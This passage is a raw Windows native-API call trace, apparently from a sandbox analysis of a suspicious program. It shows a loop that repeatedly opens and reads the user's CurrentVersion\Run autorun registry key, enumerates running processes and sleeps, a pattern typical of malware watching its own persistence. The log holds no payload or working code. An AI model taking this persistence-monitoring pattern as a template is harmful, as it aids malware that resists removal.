Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.854] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.854] NtClose (Handle=0xec) returned 0x0 [0189.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.858] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.900] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.900] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.900] NtClose (Handle=0xec) returned 0x0 [0189.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.904] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.922] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.922] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.922] NtClose (Handle=0xec) returned 0x0 [0189.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.937] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.954] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.954] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.954] NtClose (Handle=0xec) returned 0x0 [0189.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.958] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.962] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.962] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.962] NtClose (Handle=0xec) returned 0x0 [0189.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.966] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.977] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.977] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.977] NtClose (Handle=0xec) returned 0x0 [0189.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.981] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0190.052] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0190.071] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0190.071] NtClose (Handle=0xec) returned 0x0 [0190.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0190.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0190.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0190.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0190.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0190.074] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0190.607] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0190.607] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0190.607] NtClose (Handle=0xec) returned 0x0 [0190.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0190.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0190.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0190.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0190.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0190.611] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0190.661] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0190.661] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0190.661] NtClose (Handle=0xec) returned 0x0 [0190.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0190.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0190.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0190.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0190.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0190.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0190.666] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.032] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.033] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.033] NtClose (Handle=0xec) returned 0x0 [0191.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.038] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.077] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.077] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.077] NtClose (Handle=0xec) returned 0x0 [0191.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.082] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.115] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.116] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.116] NtClose (Handle=0xec) returned 0x0 [0191.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.120] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.131] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.132] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.132] NtClose (Handle=0xec) returned 0x0 [0191.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0191.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0191.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0191.136] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0191.147] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0191.147] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0191.147] NtClose (Handle=0xec) returned 0x0 [0191.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0191.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0191.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0191.148] 